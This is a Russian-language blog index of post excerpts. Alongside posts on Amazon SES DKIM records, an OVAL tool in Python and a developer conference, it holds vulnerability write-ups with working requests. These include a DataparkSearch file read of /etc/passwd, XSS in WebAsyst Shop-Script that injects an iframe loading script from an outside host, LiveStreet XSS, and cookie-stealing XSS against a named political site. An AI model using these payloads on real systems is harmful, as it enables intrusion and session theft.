Amazon SES и подтверждение DKIM в разных панелях управления

Amazon Simple Email ServicesВсё началось с того, что надо было подключить к Amazon Simple Email Service (Amazon SES) подпись DKIM. Но панель управления DNS отказалась проходить такую верификацию.

Amazon SES нам выдали записи для подтверждения владением доменом:
"Record name","Record type","Record Value"
52djzcnmdacecxkbgzwxsfxpmnhfa57k._domainkey.artemka45.ru","CNAME","52djzcnmdacecxkbgzwxsfxpmnhfa57k.dkim.amazonses.com
"mrxcednnqdhzyaf6725wxcnwdc3p7yaf._domainkey.artemka45.ru","CNAME","mrxcednnqdhzyaf6725wxcnwdc3p7yaf.dkim.amazonses.com"
"srmtzrxn7rr43o2erisj3jpqc3u4ej7b._domainkey.artemka45.ru","CNAME","srmtzrxn7rr43o2erisj3jpqc3u4ej7b.dkim.amazonses.com"



Подробности

DataparkSearch Engine, SQL injection, XSS, Cross Site Scripting, File Include

DataparkSearch
DataPark Search Engine

Все SQL-inject запросы надо кодировать в Urlencode ALL, иначе экранируются.

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd


в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146


/kurgan/cache?DU=file:///etc/passwd
/kurgan/cache?DU=file%3a%2f%2f%2fetc%2fpasswd



Blind SQL Injection

Читать дальше →

WebAsyst Shop-Script v.307 XSS

ХSS происходит при передаче в параметр EMAIL — html-кода, где мы можем вызвать iframe с вредоносным скриптом.

WebAsyst Shop-Script

POST /published/forgot.php HTTP/1.1
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=9bae5994ebe0dd6b6fe023506dde2c32; csd=5; cod=3.5.9
Host: SITE.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

C=&edited=1&enter=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8%d1%82%d1%8c&userdata%5bDB_KEY%5d=PROSTITUTKI&userdata%5bEMAIL%5d=%22%20><iframe src="http://himic.ru/xss.html"><div%20bad%3d%22&userdata%5bU_ID%5d=01%2f01%2f1967

Любимое дело. Обретение.

Знакомо ли вам чувство, что вы тратите свое время зря, просиживая часы на нелюбимой работе?

Вы устаете, вам приходится вставать в не очень хорошем настроении (ведь снова на работу), вы находитесь в ожидании конца рабочего дня, выходных, зарплаты и отпуска.

Но вы при этом хотите быть счастливым, помогать людям, заниматься тем, что будет вам по душе. Глубоко вы точно знаете, что можете дать себе и этому миру нечто большее.

У вас есть хобби?
Читать дальше →

Livestreet 0.5.1 и в 0.4, XSS, Cross Site Scripting, раскрытие директории

LiveStreet XSS
Livestreet XSS + раскрытие директории в MooTools_1.2, vlaCal-v2.1

Фаил: decade.php
POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
Host: blog.himic.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22


Читать дальше →

Реализация инструментов для создания контента OVAL на Python

Open Vulnerability and Assessment Language
Данный модуль позволяет выполнять сборку секьюрити-контента и «упаковку» его в базу данных с контролем версий и уникальности идентификаторов.

В процессе исследования языка OVAL, про который написано ранее в одной из статей, и концепции SCAP-сканера мы столкнулись с довольно серьезной проблемой, а именно с отсутствием удобных инструментов для создания контента на языке OVAL. Нет, мы не утверждаем, что нет совсем ничего. Есть небольшой набор утилит, представленных на официальном сайте. Большая часть из них платная, остальные же представляют собой не очень удобные решения, больше всего похожие на XML-Notepad. В итоге мы решили создать небольшой необходимый для работы инструмент самостоятельно, используя в качестве языка Python

Читать дальше →

UWDC 2012 конференция уральских веб-разработчиков - Как я побывал. День второй.

UWDC 2012 конференция уральских веб-разработчиков — Как я побывал. День второй.



UWDC 2012, Андрей Бешков (Microsoft) и Бабичев Игорь
Увеличить
Андрей Бешков (Microsoft)(Security Program Manager — «Руководитель программы информационной безопасности») и Бабичев Игорь
Ради этой фотки и стоило туда съездить.


Читать дальше →

UWDC 2012 конференция уральских веб-разработчиков - Как я побывал. День первый.

UWDC 2012 конференция уральских веб-разработчиков



Вобщето я приехал туда послушать про стартапы, завести новые знакомства и поддержать старые. А также посидеть в компании людей, кто тебя понимает с полуслова.

А еще найти себе девушку, которая если бы не понимала, то хотя бы ценила то, что я делаю в своей работе. И нашел, так хотелось пойти и поцеловать, но сдержался. И спросил только ручку, но она мне отдала и левую и правую ручку. У неё не было колечка на руке. Я был в шоке, и хотел забрать всю её целиком прямиком в ЗАГС. ;)

Ну давайте немного о конференции в виде фоток, а не Love-story:

UWDC, UWDC 2012
UWDC 2012 конференция уральских веб-разработчиков

Читать дальше →

Михаил Прохоров mdp2012.ru XSS

Я уважаю этого человека и он мой авторитет, но нельзя же так сайты выпускать.
Надо заботиться о информационной безопасности чуточку.

mdp2012.ru

Server:
nginx/1.0.11
Apache/1.3.42

http://mdp2012.ru/logon.html?back=/admin/%22%3E%%3CBODY%20onload=alert(document.cookie)%3E


POST http://mdp2012.ru:80/logon.html HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Cookie: _metrika_enabled=
Host: mdp2012.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.9.168 Version/12.51
Accept: */*

action=logon&back=%22><BODY%20onload=alert(document.cookie)>&login=ignkgtnu&mode=common&passwd=acUn3t1x&remember_me=1


Читать дальше →